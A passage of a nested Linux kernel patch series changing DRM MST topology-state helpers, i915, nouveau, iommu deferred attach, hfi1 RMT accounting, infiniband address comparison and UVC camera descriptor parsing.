+ EXPORT_SYMBOL(drm_atomic_get_mst_topology_state);
+ 
++/**
++ * drm_atomic_get_old_mst_topology_state: get old MST topology state in atomic state, if any
++ * @state: global atomic state
++ * @mgr: MST topology manager, also the private object in this case
++ *
++ * This function wraps drm_atomic_get_old_private_obj_state() passing in the MST atomic
++ * state vtable so that the private object state returned is that of a MST
++ * topology object.
++ *
++ * Returns:
++ *
++ * The old MST topology state, or NULL if there's no topology state for this MST mgr
++ * in the global atomic state
++ */
++struct drm_dp_mst_topology_state *
++drm_atomic_get_old_mst_topology_state(struct drm_atomic_state *state,
++				      struct drm_dp_mst_topology_mgr *mgr)
++{
++	struct drm_private_state *old_priv_state =
++		drm_atomic_get_old_private_obj_state(state, &mgr->base);
++
++	return old_priv_state ? to_dp_mst_topology_state(old_priv_state) : NULL;
++}
++EXPORT_SYMBOL(drm_atomic_get_old_mst_topology_state);
++
+ /**
+  * drm_atomic_get_new_mst_topology_state: get new MST topology state in atomic state, if any
+  * @state: global atomic state
+  * @mgr: MST topology manager, also the private object in this case
+  *
+- * This function wraps drm_atomic_get_priv_obj_state() passing in the MST atomic
++ * This function wraps drm_atomic_get_new_private_obj_state() passing in the MST atomic
+  * state vtable so that the private object state returned is that of a MST
+  * topology object.
+  *
+  * Returns:
+  *
+- * The MST topology state, or NULL if there's no topology state for this MST mgr
++ * The new MST topology state, or NULL if there's no topology state for this MST mgr
+  * in the global atomic state
+  */
+ struct drm_dp_mst_topology_state *
+ drm_atomic_get_new_mst_topology_state(struct drm_atomic_state *state,
+ 				      struct drm_dp_mst_topology_mgr *mgr)
+ {
+-	struct drm_private_state *priv_state =
++	struct drm_private_state *new_priv_state =
+ 		drm_atomic_get_new_private_obj_state(state, &mgr->base);
+ 
+-	return priv_state ? to_dp_mst_topology_state(priv_state) : NULL;
++	return new_priv_state ? to_dp_mst_topology_state(new_priv_state) : NULL;
+ }
+ EXPORT_SYMBOL(drm_atomic_get_new_mst_topology_state);
+ 
+diff --git a/drivers/gpu/drm/i915/Kconfig b/drivers/gpu/drm/i915/Kconfig
+index 3efce05d7b57c..3a6e176d77aa5 100644
+--- a/drivers/gpu/drm/i915/Kconfig
++++ b/drivers/gpu/drm/i915/Kconfig
+@@ -107,9 +107,6 @@ config DRM_I915_USERPTR
+ 
+ 	  If in doubt, say "Y".
+ 
+-config DRM_I915_GVT
+-	bool
+-
+ config DRM_I915_GVT_KVMGT
+ 	tristate "Enable KVM host support Intel GVT-g graphics virtualization"
+ 	depends on DRM_I915
+@@ -160,3 +157,6 @@ menu "drm/i915 Unstable Evolution"
+ 	depends on DRM_I915
+ 	source "drivers/gpu/drm/i915/Kconfig.unstable"
+ endmenu
++
++config DRM_I915_GVT
++	bool
+diff --git a/drivers/gpu/drm/i915/display/intel_display.c b/drivers/gpu/drm/i915/display/intel_display.c
+index 6c2686ecb62a2..dedbdb175f8b4 100644
+--- a/drivers/gpu/drm/i915/display/intel_display.c
++++ b/drivers/gpu/drm/i915/display/intel_display.c
+@@ -5950,6 +5950,10 @@ int intel_modeset_all_pipes(struct intel_atomic_state *state,
+ 		if (ret)
+ 			return ret;
+ 
++		ret = intel_dp_mst_add_topology_state_for_crtc(state, crtc);
++		if (ret)
++			return ret;
++
+ 		ret = intel_atomic_add_affected_planes(state, crtc);
+ 		if (ret)
+ 			return ret;
+diff --git a/drivers/gpu/drm/i915/display/intel_dp_mst.c b/drivers/gpu/drm/i915/display/intel_dp_mst.c
+index 4077a979a9249..dcda003d5a6e2 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp_mst.c
++++ b/drivers/gpu/drm/i915/display/intel_dp_mst.c
+@@ -365,8 +365,14 @@ static void intel_mst_disable_dp(struct intel_atomic_state *state,
+ 	struct intel_dp *intel_dp = &dig_port->dp;
+ 	struct intel_connector *connector =
+ 		to_intel_connector(old_conn_state->connector);
+-	struct drm_dp_mst_topology_state *mst_state =
+-		drm_atomic_get_mst_topology_state(&state->base, &intel_dp->mst_mgr);
++	struct drm_dp_mst_topology_state *old_mst_state =
++		drm_atomic_get_old_mst_topology_state(&state->base, &intel_dp->mst_mgr);
++	struct drm_dp_mst_topology_state *new_mst_state =
++		drm_atomic_get_new_mst_topology_state(&state->base, &intel_dp->mst_mgr);
++	const struct drm_dp_mst_atomic_payload *old_payload =
++		drm_atomic_get_mst_payload_state(old_mst_state, connector->port);
++	struct drm_dp_mst_atomic_payload *new_payload =
++		drm_atomic_get_mst_payload_state(new_mst_state, connector->port);
+ 	struct drm_i915_private *i915 = to_i915(connector->base.dev);
+ 
+ 	drm_dbg_kms(&i915->drm, "active links %d\n",
+@@ -374,8 +380,8 @@ static void intel_mst_disable_dp(struct intel_atomic_state *state,
+ 
+ 	intel_hdcp_disable(intel_mst->connector);
+ 
+-	drm_dp_remove_payload(&intel_dp->mst_mgr, mst_state,
+-			      drm_atomic_get_mst_payload_state(mst_state, connector->port));
++	drm_dp_remove_payload(&intel_dp->mst_mgr, new_mst_state,
++			      old_payload, new_payload);
+ 
+ 	intel_audio_codec_disable(encoder, old_crtc_state, old_conn_state);
+ }
+@@ -1018,3 +1024,64 @@ bool intel_dp_mst_is_slave_trans(const struct intel_crtc_state *crtc_state)
+ 	return crtc_state->mst_master_transcoder != INVALID_TRANSCODER &&
+ 	       crtc_state->mst_master_transcoder != crtc_state->cpu_transcoder;
+ }
++
++/**
++ * intel_dp_mst_add_topology_state_for_connector - add MST topology state for a connector
++ * @state: atomic state
++ * @connector: connector to add the state for
++ * @crtc: the CRTC @connector is attached to
++ *
++ * Add the MST topology state for @connector to @state.
++ *
++ * Returns 0 on success, negative error code on failure.
++ */
++static int
++intel_dp_mst_add_topology_state_for_connector(struct intel_atomic_state *state,
++					      struct intel_connector *connector,
++					      struct intel_crtc *crtc)
++{
++	struct drm_dp_mst_topology_state *mst_state;
++
++	if (!connector->mst_port)
++		return 0;
++
++	mst_state = drm_atomic_get_mst_topology_state(&state->base,
++						      &connector->mst_port->mst_mgr);
++	if (IS_ERR(mst_state))
++		return PTR_ERR(mst_state);
++
++	mst_state->pending_crtc_mask |= drm_crtc_mask(&crtc->base);
++
++	return 0;
++}
++
++/**
++ * intel_dp_mst_add_topology_state_for_crtc - add MST topology state for a CRTC
++ * @state: atomic state
++ * @crtc: CRTC to add the state for
++ *
++ * Add the MST topology state for @crtc to @state.
++ *
++ * Returns 0 on success, negative error code on failure.
++ */
++int intel_dp_mst_add_topology_state_for_crtc(struct intel_atomic_state *state,
++					     struct intel_crtc *crtc)
++{
++	struct drm_connector *_connector;
++	struct drm_connector_state *conn_state;
++	int i;
++
++	for_each_new_connector_in_state(&state->base, _connector, conn_state, i) {
++		struct intel_connector *connector = to_intel_connector(_connector);
++		int ret;
++
++		if (conn_state->crtc != &crtc->base)
++			continue;
++
++		ret = intel_dp_mst_add_topology_state_for_connector(state, connector, crtc);
++		if (ret)
++			return ret;
++	}
++
++	return 0;
++}
+diff --git a/drivers/gpu/drm/i915/display/intel_dp_mst.h b/drivers/gpu/drm/i915/display/intel_dp_mst.h
+index f7301de6cdfb3..f1815bb722672 100644
+--- a/drivers/gpu/drm/i915/display/intel_dp_mst.h
++++ b/drivers/gpu/drm/i915/display/intel_dp_mst.h
+@@ -8,6 +8,8 @@
+ 
+ #include <linux/types.h>
+ 
++struct intel_atomic_state;
++struct intel_crtc;
+ struct intel_crtc_state;
+ struct intel_digital_port;
+ struct intel_dp;
+@@ -18,5 +20,7 @@ int intel_dp_mst_encoder_active_links(struct intel_digital_port *dig_port);
+ bool intel_dp_mst_is_master_trans(const struct intel_crtc_state *crtc_state);
+ bool intel_dp_mst_is_slave_trans(const struct intel_crtc_state *crtc_state);
+ bool intel_dp_mst_source_support(struct intel_dp *intel_dp);
++int intel_dp_mst_add_topology_state_for_crtc(struct intel_atomic_state *state,
++					     struct intel_crtc *crtc);
+ 
+ #endif /* __INTEL_DP_MST_H__ */
+diff --git a/drivers/gpu/drm/i915/display/intel_fbdev.c b/drivers/gpu/drm/i915/display/intel_fbdev.c
+index f76c06b7f1d4a..17e8bf2ac0e51 100644
+--- a/drivers/gpu/drm/i915/display/intel_fbdev.c
++++ b/drivers/gpu/drm/i915/display/intel_fbdev.c
+@@ -638,7 +638,13 @@ void intel_fbdev_set_suspend(struct drm_device *dev, int state, bool synchronous
+ 	struct intel_fbdev *ifbdev = dev_priv->display.fbdev.fbdev;
+ 	struct fb_info *info;
+ 
+-	if (!ifbdev || !ifbdev->vma)
++	if (!ifbdev)
++		return;
++
++	if (drm_WARN_ON(&dev_priv->drm, !HAS_DISPLAY(dev_priv)))
++		return;
++
++	if (!ifbdev->vma)
+ 		goto set_suspend;
+ 
+ 	info = ifbdev->helper.info;
+diff --git a/drivers/gpu/drm/i915/gt/intel_gt_mcr.c b/drivers/gpu/drm/i915/gt/intel_gt_mcr.c
+index 58ea3325bbdaa..fa2b9c48f39b2 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gt_mcr.c
++++ b/drivers/gpu/drm/i915/gt/intel_gt_mcr.c
+@@ -464,12 +464,15 @@ static bool reg_needs_read_steering(struct intel_gt *gt,
+ 				    i915_mcr_reg_t reg,
+ 				    enum intel_steering_type type)
+ {
+-	const u32 offset = i915_mmio_reg_offset(reg);
++	u32 offset = i915_mmio_reg_offset(reg);
+ 	const struct intel_mmio_range *entry;
+ 
+ 	if (likely(!gt->steering_table[type]))
+ 		return false;
+ 
++	if (IS_GSI_REG(offset))
++		offset += gt->uncore->gsi_offset;
++
+ 	for (entry = gt->steering_table[type]; entry->end; entry++) {
+ 		if (offset >= entry->start && offset <= entry->end)
+ 			return true;
+diff --git a/drivers/gpu/drm/nouveau/dispnv50/disp.c b/drivers/gpu/drm/nouveau/dispnv50/disp.c
+index edcb2529b4025..ed9d374147b8d 100644
+--- a/drivers/gpu/drm/nouveau/dispnv50/disp.c
++++ b/drivers/gpu/drm/nouveau/dispnv50/disp.c
+@@ -885,7 +885,7 @@ nv50_msto_prepare(struct drm_atomic_state *state,
+ 
+ 	// TODO: Figure out if we want to do a better job of handling VCPI allocation failures here?
+ 	if (msto->disabled) {
+-		drm_dp_remove_payload(mgr, mst_state, payload);
++		drm_dp_remove_payload(mgr, mst_state, payload, payload);
+ 
+ 		nvif_outp_dp_mst_vcpi(&mstm->outp->outp, msto->head->base.index, 0, 0, 0, 0);
+ 	} else {
+diff --git a/drivers/iio/accel/mma9551_core.c b/drivers/iio/accel/mma9551_core.c
+index 64ca7d7a9673d..b898f865fb875 100644
+--- a/drivers/iio/accel/mma9551_core.c
++++ b/drivers/iio/accel/mma9551_core.c
+@@ -296,9 +296,12 @@ int mma9551_read_config_word(struct i2c_client *client, u8 app_id,
+ 
+ 	ret = mma9551_transfer(client, app_id, MMA9551_CMD_READ_CONFIG,
+ 			       reg, NULL, 0, (u8 *)&v, 2);
++	if (ret < 0)
++		return ret;
++
+ 	*val = be16_to_cpu(v);
+ 
+-	return ret;
++	return 0;
+ }
+ EXPORT_SYMBOL_NS(mma9551_read_config_word, IIO_MMA9551);
+ 
+@@ -354,9 +357,12 @@ int mma9551_read_status_word(struct i2c_client *client, u8 app_id,
+ 
+ 	ret = mma9551_transfer(client, app_id, MMA9551_CMD_READ_STATUS,
+ 			       reg, NULL, 0, (u8 *)&v, 2);
++	if (ret < 0)
++		return ret;
++
+ 	*val = be16_to_cpu(v);
+ 
+-	return ret;
++	return 0;
+ }
+ EXPORT_SYMBOL_NS(mma9551_read_status_word, IIO_MMA9551);
+ 
+diff --git a/drivers/infiniband/core/cma.c b/drivers/infiniband/core/cma.c
+index 68721ff10255e..7e508b15e7761 100644
+--- a/drivers/infiniband/core/cma.c
++++ b/drivers/infiniband/core/cma.c
+@@ -479,13 +479,20 @@ static int compare_netdev_and_ip(int ifindex_a, struct sockaddr *sa,
+ 	if (sa->sa_family != sb->sa_family)
+ 		return sa->sa_family - sb->sa_family;
+ 
+-	if (sa->sa_family == AF_INET)
+-		return memcmp((char *)&((struct sockaddr_in *)sa)->sin_addr,
+-			      (char *)&((struct sockaddr_in *)sb)->sin_addr,
++	if (sa->sa_family == AF_INET &&
++	    __builtin_object_size(sa, 0) >= sizeof(struct sockaddr_in)) {
++		return memcmp(&((struct sockaddr_in *)sa)->sin_addr,
++			      &((struct sockaddr_in *)sb)->sin_addr,
+ 			      sizeof(((struct sockaddr_in *)sa)->sin_addr));
++	}
++
++	if (sa->sa_family == AF_INET6 &&
++	    __builtin_object_size(sa, 0) >= sizeof(struct sockaddr_in6)) {
++		return ipv6_addr_cmp(&((struct sockaddr_in6 *)sa)->sin6_addr,
++				     &((struct sockaddr_in6 *)sb)->sin6_addr);
++	}
+ 
+-	return ipv6_addr_cmp(&((struct sockaddr_in6 *)sa)->sin6_addr,
+-			     &((struct sockaddr_in6 *)sb)->sin6_addr);
++	return -1;
+ }
+ 
+ static int cma_add_id_to_tree(struct rdma_id_private *node_id_priv)
+diff --git a/drivers/infiniband/hw/hfi1/chip.c b/drivers/infiniband/hw/hfi1/chip.c
+index ebe970f76232d..90b672feed83d 100644
+--- a/drivers/infiniband/hw/hfi1/chip.c
++++ b/drivers/infiniband/hw/hfi1/chip.c
+@@ -1056,7 +1056,7 @@ static void read_link_down_reason(struct hfi1_devdata *dd, u8 *ldr);
+ static void handle_temp_err(struct hfi1_devdata *dd);
+ static void dc_shutdown(struct hfi1_devdata *dd);
+ static void dc_start(struct hfi1_devdata *dd);
+-static int qos_rmt_entries(struct hfi1_devdata *dd, unsigned int *mp,
++static int qos_rmt_entries(unsigned int n_krcv_queues, unsigned int *mp,
+ 			   unsigned int *np);
+ static void clear_full_mgmt_pkey(struct hfi1_pportdata *ppd);
+ static int wait_link_transfer_active(struct hfi1_devdata *dd, int wait_ms);
+@@ -13362,7 +13362,6 @@ static int set_up_context_variables(struct hfi1_devdata *dd)
+ 	int ret;
+ 	unsigned ngroups;
+ 	int rmt_count;
+-	int user_rmt_reduced;
+ 	u32 n_usr_ctxts;
+ 	u32 send_contexts = chip_send_contexts(dd);
+ 	u32 rcv_contexts = chip_rcv_contexts(dd);
+@@ -13421,28 +13420,34 @@ static int set_up_context_variables(struct hfi1_devdata *dd)
+ 					 (num_kernel_contexts + n_usr_ctxts),
+ 					 &node_affinity.real_cpu_mask);
+ 	/*
+-	 * The RMT entries are currently allocated as shown below:
+-	 * 1. QOS (0 to 128 entries);
+-	 * 2. FECN (num_kernel_context - 1 + num_user_contexts +
+-	 *    num_netdev_contexts);
+-	 * 3. netdev (num_netdev_contexts).
+-	 * It should be noted that FECN oversubscribe num_netdev_contexts
+-	 * entries of RMT because both netdev and PSM could allocate any receive
+-	 * context between dd->first_dyn_alloc_text and dd->num_rcv_contexts,
+-	 * and PSM FECN must reserve an RMT entry for each possible PSM receive
+-	 * context.
++	 * RMT entries are allocated as follows:
++	 * 1. QOS (0 to 128 entries)
++	 * 2. FECN (num_kernel_context - 1 [a] + num_user_contexts +
++	 *          num_netdev_contexts [b])
++	 * 3. netdev (NUM_NETDEV_MAP_ENTRIES)
++	 *
++	 * Notes:
++	 * [a] Kernel contexts (except control) are included in FECN if kernel
++	 *     TID_RDMA is active.
++	 * [b] Netdev and user contexts are randomly allocated from the same
++	 *     context pool, so FECN must cover all contexts in the pool.
+ 	 */
+-	rmt_count = qos_rmt_entries(dd, NULL, NULL) + (num_netdev_contexts * 2);
+-	if (HFI1_CAP_IS_KSET(TID_RDMA))
+-		rmt_count += num_kernel_contexts - 1;
+-	if (rmt_count + n_usr_ctxts > NUM_MAP_ENTRIES) {
+-		user_rmt_reduced = NUM_MAP_ENTRIES - rmt_count;
+-		dd_dev_err(dd,
+-			   "RMT size is reducing the number of user receive contexts from %u to %d\n",
+-			   n_usr_ctxts,
+-			   user_rmt_reduced);
+-		/* recalculate */
+-		n_usr_ctxts = user_rmt_reduced;
++	rmt_count = qos_rmt_entries(num_kernel_contexts - 1, NULL, NULL)
++		    + (HFI1_CAP_IS_KSET(TID_RDMA) ? num_kernel_contexts - 1
++						  : 0)
++		    + n_usr_ctxts
++		    + num_netdev_contexts
++		    + NUM_NETDEV_MAP_ENTRIES;
++	if (rmt_count > NUM_MAP_ENTRIES) {
++		int over = rmt_count - NUM_MAP_ENTRIES;
++		/* try to squish user contexts, minimum of 1 */
++		if (over >= n_usr_ctxts) {
++			dd_dev_err(dd, "RMT overflow: reduce the requested number of contexts\n");
++			return -EINVAL;
++		}
++		dd_dev_err(dd, "RMT overflow: reducing # user contexts from %u to %u\n",
++			   n_usr_ctxts, n_usr_ctxts - over);
++		n_usr_ctxts -= over;
+ 	}
+ 
+ 	/* the first N are kernel contexts, the rest are user/netdev contexts */
+@@ -14299,15 +14304,15 @@ static void clear_rsm_rule(struct hfi1_devdata *dd, u8 rule_index)
+ }
+ 
+ /* return the number of RSM map table entries that will be used for QOS */
+-static int qos_rmt_entries(struct hfi1_devdata *dd, unsigned int *mp,
++static int qos_rmt_entries(unsigned int n_krcv_queues, unsigned int *mp,
+ 			   unsigned int *np)
+ {
+ 	int i;
+ 	unsigned int m, n;
+-	u8 max_by_vl = 0;
++	uint max_by_vl = 0;
+ 
+ 	/* is QOS active at all? */
+-	if (dd->n_krcv_queues <= MIN_KERNEL_KCTXTS ||
++	if (n_krcv_queues < MIN_KERNEL_KCTXTS ||
+ 	    num_vls == 1 ||
+ 	    krcvqsset <= 1)
+ 		goto no_qos;
+@@ -14365,7 +14370,7 @@ static void init_qos(struct hfi1_devdata *dd, struct rsm_map_table *rmt)
+ 
+ 	if (!rmt)
+ 		goto bail;
+-	rmt_entries = qos_rmt_entries(dd, &m, &n);
++	rmt_entries = qos_rmt_entries(dd->n_krcv_queues - 1, &m, &n);
+ 	if (rmt_entries == 0)
+ 		goto bail;
+ 	qpns_per_vl = 1 << m;
+diff --git a/drivers/iommu/iommu.c b/drivers/iommu/iommu.c
+index 50d858f36a81b..f8100067502fb 100644
+--- a/drivers/iommu/iommu.c
++++ b/drivers/iommu/iommu.c
+@@ -371,6 +371,30 @@ err_unlock:
+ 	return ret;
+ }
+ 
++static bool iommu_is_attach_deferred(struct device *dev)
++{
++	const struct iommu_ops *ops = dev_iommu_ops(dev);
++
++	if (ops->is_attach_deferred)
++		return ops->is_attach_deferred(dev);
++
++	return false;
++}
++
++static int iommu_group_do_dma_first_attach(struct device *dev, void *data)
++{
++	struct iommu_domain *domain = data;
++
++	lockdep_assert_held(&dev->iommu_group->mutex);
++
++	if (iommu_is_attach_deferred(dev)) {
++		dev->iommu->attach_deferred = 1;
++		return 0;
++	}
++
++	return __iommu_attach_device(domain, dev);
++}
++
+ int iommu_probe_device(struct device *dev)
+ {
+ 	const struct iommu_ops *ops;
+@@ -401,7 +425,7 @@ int iommu_probe_device(struct device *dev)
+ 	 * attach the default domain.
+ 	 */
+ 	if (group->default_domain && !group->owner) {
+-		ret = __iommu_attach_device(group->default_domain, dev);
++		ret = iommu_group_do_dma_first_attach(dev, group->default_domain);
+ 		if (ret) {
+ 			mutex_unlock(&group->mutex);
+ 			iommu_group_put(group);
+@@ -951,16 +975,6 @@ out:
+ 	return ret;
+ }
+ 
+-static bool iommu_is_attach_deferred(struct device *dev)
+-{
+-	const struct iommu_ops *ops = dev_iommu_ops(dev);
+-
+-	if (ops->is_attach_deferred)
+-		return ops->is_attach_deferred(dev);
+-
+-	return false;
+-}
+-
+ /**
+  * iommu_group_add_device - add a device to an iommu group
+  * @group: the group into which to add the device (reference should be held)
+@@ -1013,8 +1027,8 @@ rename:
+ 
+ 	mutex_lock(&group->mutex);
+ 	list_add_tail(&device->list, &group->devices);
+-	if (group->domain  && !iommu_is_attach_deferred(dev))
+-		ret = __iommu_attach_device(group->domain, dev);
++	if (group->domain)
++		ret = iommu_group_do_dma_first_attach(dev, group->domain);
+ 	mutex_unlock(&group->mutex);
+ 	if (ret)
+ 		goto err_put_group;
+@@ -1780,21 +1794,10 @@ static void probe_alloc_default_domain(struct bus_type *bus,
+ 
+ }
+ 
+-static int iommu_group_do_dma_attach(struct device *dev, void *data)
+-{
+-	struct iommu_domain *domain = data;
+-	int ret = 0;
+-
+-	if (!iommu_is_attach_deferred(dev))
+-		ret = __iommu_attach_device(domain, dev);
+-
+-	return ret;
+-}
+-
+-static int __iommu_group_dma_attach(struct iommu_group *group)
++static int __iommu_group_dma_first_attach(struct iommu_group *group)
+ {
+ 	return __iommu_group_for_each_dev(group, group->default_domain,
+-					  iommu_group_do_dma_attach);
++					  iommu_group_do_dma_first_attach);
+ }
+ 
+ static int iommu_group_do_probe_finalize(struct device *dev, void *data)
+@@ -1859,7 +1862,7 @@ int bus_iommu_probe(struct bus_type *bus)
+ 
+ 		iommu_group_create_direct_mappings(group);
+ 
+-		ret = __iommu_group_dma_attach(group);
++		ret = __iommu_group_dma_first_attach(group);
+ 
+ 		mutex_unlock(&group->mutex);
+ 
+@@ -1991,9 +1994,11 @@ static int __iommu_attach_device(struct iommu_domain *domain,
+ 		return -ENODEV;
+ 
+ 	ret = domain->ops->attach_dev(domain, dev);
+-	if (!ret)
+-		trace_attach_device_to_domain(dev);
+-	return ret;
++	if (ret)
++		return ret;
++	dev->iommu->attach_deferred = 0;
++	trace_attach_device_to_domain(dev);
++	return 0;
+ }
+ 
+ /**
+@@ -2038,7 +2043,7 @@ EXPORT_SYMBOL_GPL(iommu_attach_device);
+ 
+ int iommu_deferred_attach(struct device *dev, struct iommu_domain *domain)
+ {
+-	if (iommu_is_attach_deferred(dev))
++	if (dev->iommu && dev->iommu->attach_deferred)
+ 		return __iommu_attach_device(domain, dev);
+ 
+ 	return 0;
+@@ -2047,9 +2052,6 @@ int iommu_deferred_attach(struct device *dev, struct iommu_domain *domain)
+ static void __iommu_detach_device(struct iommu_domain *domain,
+ 				  struct device *dev)
+ {
+-	if (iommu_is_attach_deferred(dev))
+-		return;
+-
+ 	domain->ops->detach_dev(domain, dev);
+ 	trace_detach_device_from_domain(dev);
+ }
+diff --git a/drivers/media/usb/uvc/uvc_ctrl.c b/drivers/media/usb/uvc/uvc_ctrl.c
+index 44b0cfb8ee1c7..067b43a1cb3eb 100644
+--- a/drivers/media/usb/uvc/uvc_ctrl.c
++++ b/drivers/media/usb/uvc/uvc_ctrl.c
+@@ -6,6 +6,7 @@
+  *          Laurent Pinchart (laurent.pinchart@ideasonboard.com)
+  */
+ 
++#include <asm/barrier.h>
+ #include <linux/bitops.h>
+ #include <linux/kernel.h>
+ #include <linux/list.h>
+@@ -1509,6 +1510,10 @@ static void uvc_ctrl_status_event_work(struct work_struct *work)
+ 
+ 	uvc_ctrl_status_event(w->chain, w->ctrl, w->data);
+ 
++	/* The barrier is needed to synchronize with uvc_status_stop(). */
++	if (smp_load_acquire(&dev->flush_status))
++		return;
++
+ 	/* Resubmit the URB. */
+ 	w->urb->interval = dev->int_ep->desc.bInterval;
+ 	ret = usb_submit_urb(w->urb, GFP_KERNEL);
+diff --git a/drivers/media/usb/uvc/uvc_driver.c b/drivers/media/usb/uvc/uvc_driver.c
+index d5ff8df20f18a..362df9dd31525 100644
+--- a/drivers/media/usb/uvc/uvc_driver.c
++++ b/drivers/media/usb/uvc/uvc_driver.c
+@@ -252,14 +252,10 @@ static int uvc_parse_format(struct uvc_device *dev,
+ 		fmtdesc = uvc_format_by_guid(&buffer[5]);
+ 
+ 		if (fmtdesc != NULL) {
+-			strscpy(format->name, fmtdesc->name,
+-				sizeof(format->name));
+ 			format->fcc = fmtdesc->fcc;
+ 		} else {
+ 			dev_info(&streaming->intf->dev,
+ 				 "Unknown video format %pUl\n", &buffer[5]);
+-			snprintf(format->name, sizeof(format->name), "%pUl\n",
+-				&buffer[5]);
+ 			format->fcc = 0;
+ 		}
+ 
+@@ -271,8 +267,6 @@ static int uvc_parse_format(struct uvc_device *dev,
+ 		 */
+ 		if (dev->quirks & UVC_QUIRK_FORCE_Y8) {
+ 			if (format->fcc == V4L2_PIX_FMT_YUYV) {
+-				strscpy(format->name, "Greyscale 8-bit (Y8  )",
+-					sizeof(format->name));
+ 				format->fcc = V4L2_PIX_FMT_GREY;
+ 				format->bpp = 8;
+ 				width_multiplier = 2;
+@@ -313,7 +307,6 @@ static int uvc_parse_format(struct uvc_device *dev,
+ 			return -EINVAL;
+ 		}
+ 
+-		strscpy(format->name, "MJPEG", sizeof(format->name));
+ 		format->fcc = V4L2_PIX_FMT_MJPEG;
+ 		format->flags = UVC_FMT_FLAG_COMPRESSED;
+ 		format->bpp = 0;
+@@ -329,17 +322,7 @@ static int uvc_parse_format(struct uvc_device *dev,
+ 			return -EINVAL;
+ 		}
+ 
+-		switch (buffer[8] & 0x7f) {
+-		case 0:
+-			strscpy(format->name, "SD-DV", sizeof(format->name));
+-			break;
+-		case 1:
+-			strscpy(format->name, "SDL-DV", sizeof(format->name));
+-			break;
+-		case 2:
+-			strscpy(format->name, "HD-DV", sizeof(format->name));
+-			break;
+-		default:
++		if ((buffer[8] & 0x7f) > 2) {
+ 			uvc_dbg(dev, DESCR,
+ 				"device %d videostreaming interface %d: unknown DV format %u\n",
+ 				dev->udev->devnum,
+@@ -347,9 +330,6 @@ static int uvc_parse_format(struct uvc_device *dev,
+ 			return -EINVAL;
+ 		}
+ 
+-		strlcat(format->name, buffer[8] & (1 << 7) ? " 60Hz" : " 50Hz",
+-			sizeof(format->name));
+-
+ 		format->fcc = V4L2_PIX_FMT_DV;
+ 		format->flags = UVC_FMT_FLAG_COMPRESSED | UVC_FMT_FLAG_STREAM;
+ 		format->bpp = 0;
+@@ -376,7 +356,7 @@ static int uvc_parse_format(struct uvc_device *dev,
+ 		return -EINVAL;
+ 	}
+ 
+-	uvc_dbg(dev, DESCR, "Found format %s\n", format->name);
++	uvc_dbg(dev, DESCR, "Found format %p4cc", &format->fcc);
+ 
+ 	buflen -= buffer[0];
+ 	buffer += buffer[0];
+@@ -880,10 +860,8 @@ static int uvc_parse_vendor_control(struct uvc_device *dev,
+ 					       + n;
+ 		memcpy(unit->extension.bmControls, &buffer[23+p], 2*n);
+ 
+-		if (buffer[24+p+2*n] != 0)
+-			usb_string(udev, buffer[24+p+2*n], unit->name,
+-				   sizeof(unit->name));
+-		else
++		if (buffer[24+p+2*n] == 0 ||
++		    usb_string(udev, buffer[24+p+2*n], unit->name, sizeof(unit->name)) < 0)
+ 			sprintf(unit->name, "Extension %u", buffer[3]);
+ 
+ 		list_add_tail(&unit->list, &dev->entities);
+@@ -1007,15 +985,15 @@ static int uvc_parse_standard_control(struct uvc_device *dev,
+ 			memcpy(term->media.bmTransportModes, &buffer[10+n], p);
+ 		}
+ 
+-		if (buffer[7] != 0)
+-			usb_string(udev, buffer[7], term->name,
+-				   sizeof(term->name));
+-		else if (UVC_ENTITY_TYPE(term) == UVC_ITT_CAMERA)
+-			sprintf(term->name, "Camera %u", buffer[3]);
+-		else if (UVC_ENTITY_TYPE(term) == UVC_ITT_MEDIA_TRANSPORT_INPUT)
+-			sprintf(term->name, "Media %u", buffer[3]);
+-		else
+-			sprintf(term->name, "Input %u", buffer[3]);
++		if (buffer[7] == 0 ||
++		    usb_string(udev, buffer[7], term->name, sizeof(term->name)) < 0) {
++			if (UVC_ENTITY_TYPE(term) == UVC_ITT_CAMERA)
++				sprintf(term->name, "Camera %u", buffer[3]);
++			if (UVC_ENTITY_TYPE(term) == UVC_ITT_MEDIA_TRANSPORT_INPUT)
++				sprintf(term->name, "Media %u", buffer[3]);
++			else
++				sprintf(term->name, "Input %u", buffer[3]);
++		}
+ 
+ 		list_add_tail(&term->list, &dev->entities);
+ 		break;
+@@ -1048,10 +1026,8 @@ static int uvc_parse_standard_control(struct uvc_device *dev,
+ 
+ 		memcpy(term->baSourceID, &buffer[7], 1);
+ 
+-		if (buffer[8] != 0)
+-			usb_string(udev, buffer[8], term->name,
+-				   sizeof(term->name));
+-		else
++		if (buffer[8] == 0 ||
++		    usb_string(udev, buffer[8], term->name, sizeof(term->name)) < 0)
+ 			sprintf(term->name, "Output %u", buffer[3]);
+ 
+ 		list_add_tail(&term->list, &dev->entities);
+@@ -1073,10 +1049,8 @@ static int uvc_parse_standard_control(struct uvc_device *dev,
+ 
+ 		memcpy(unit->baSourceID, &buffer[5], p);
+ 
+-		if (buffer[5+p] != 0)
+-			usb_string(udev, buffer[5+p], unit->name,
+-				   sizeof(unit->name));
+-		else
++		if (buffer[5+p] == 0 ||
++		    usb_string(udev, buffer[5+p], unit->name, sizeof(unit->name)) < 0)
+ 			sprintf(unit->name, "Selector %u", buffer[3]);
+ 
+ 		list_add_tail(&unit->list, &dev->entities);
+@@ -1106,10 +1080,8 @@ static int uvc_parse_standard_control(struct uvc_device *dev,
+ 		if (dev->uvc_version >= 0x0110)
+ 			unit->processing.bmVideoStandards = buffer[9+n];
+ 
+-		if (buffer[8+n] != 0)
+-			usb_string(udev, buffer[8+n], unit->name,
+-				   sizeof(unit->name));
+-		else
++		if (buffer[8+n] == 0 ||
++		    usb_string(udev, buffer[8+n], unit->name, sizeof(unit->name)) < 0)
+ 			sprintf(unit->name, "Processing %u", buffer[3]);
+ 
+ 		list_add_tail(&unit->list, &dev->entities);
+@@ -1137,10 +1109,8 @@ static int uvc_parse_standard_control(struct uvc_device *dev,
+ 		unit->extension.bmControls = (u8 *)unit + sizeof(*unit);
+ 		memcpy(unit->extension.bmControls, &buffer[23+p], n);
+ 
+-		if (buffer[23+p+n] != 0)
+-			usb_string(udev, buffer[23+p+n], unit->name,
+-				   sizeof(unit->name));
+-		else
++		if (buffer[23+p+n] == 0 ||
++		    usb_string(udev, buffer[23+p+n], unit->name, sizeof(unit->name)) < 0)
+ 			sprintf(unit->name, "Extension %u", buffer[3]);
+ 
+ 		list_add_tail(&unit->list, &dev->entities);
+@@ -2480,6 +2450,24 @@ static const struct usb_device_id uvc_ids[] = {
